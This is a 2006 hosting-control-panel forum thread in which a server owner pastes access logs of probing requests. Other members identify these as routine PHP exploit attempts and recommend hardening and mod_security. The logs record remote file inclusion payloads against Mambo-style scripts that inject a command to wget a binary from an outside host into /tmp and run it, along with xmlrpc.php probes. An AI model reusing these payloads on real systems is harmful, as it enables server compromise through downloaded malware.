The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

scaninng my web server

Discussion in 'General Discussion' started by laverdir, Feb 26, 2006.

  1. laverdir

    laverdir Registered

    Joined:
    Feb 26, 2006
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    i know that you cpanel guys are searching for illegal users, but 'brute force' scanning of every ip address isn't the way. an appology will be fine!

    69.93.35.178 - - [26/Feb/2006:08:02:38 -0600] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 298
    69.93.35.178 - - [26/Feb/2006:08:02:39 -0600] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 200 586
    69.93.35.178 - - [26/Feb/2006:08:02:40 -0600] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 304
    69.93.35.178 - - [26/Feb/2006:08:02:41 -0600] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 302
    69.93.35.178 - - [26/Feb/2006:08:02:42 -0600] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 313
    69.93.35.178 - - [26/Feb/2006:08:02:44 -0600] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 308
    69.93.35.178 - - [26/Feb/2006:08:02:46 -0600] "POST /xmlrpc.php HTTP/1.1" 404 298
    69.93.35.178 - - [26/Feb/2006:08:02:47 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 303
    69.93.35.178 - - [26/Feb/2006:08:02:48 -0600] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 310
    69.93.35.178 - - [26/Feb/2006:08:02:50 -0600] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 311
    69.93.35.178 - - [26/Feb/2006:08:02:51 -0600] "POST /drupal/xmlrpc.php HTTP/1.1" 404 305
    69.93.35.178 - - [26/Feb/2006:08:02:52 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 311
    69.93.35.178 - - [26/Feb/2006:08:02:53 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 308
    69.93.35.178 - - [26/Feb/2006:08:02:55 -0600] "POST /xmlrpc.php HTTP/1.1" 404 298
    69.93.35.178 - - [26/Feb/2006:08:02:56 -0600] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 305
    69.93.35.178 - - [26/Feb/2006:08:02:57 -0600] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 305
     
  2. rustelekom

    rustelekom Well-Known Member
    PartnerNOC

    Joined:
    Nov 13, 2003
    Messages:
    290
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    moscow
    it is the virus. virus scan your servers for voulnarabilities.
     
  3. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    The most important thing is securing your server.
     
    #3 AndyReed, Feb 26, 2006
    Last edited: Feb 26, 2006
  4. laverdir

    laverdir Registered

    Joined:
    Feb 26, 2006
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
  5. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
  6. laverdir

    laverdir Registered

    Joined:
    Feb 26, 2006
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    i don't think that is related, i have entered ip address in my browser.

    but it could be related to the famous 'dns poisoning'..
     
  7. dave9000

    dave9000 Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    891
    Likes Received:
    1
    Trophy Points:
    16
    Location:
    arkansas
    cPanel Access Level:
    Root Administrator
    It;s attempts to exploit various php scripts. If that is the only ip you have been hit from consider yourself lucky. We get hit average of 5-10 times a hr with basically the same thing.

    You need to secure your server like andy said. If your running apache then mod_security would be a good addition.

    These exploit attempts did not come from www.cpanel.net.
     
Loading...

Share This Page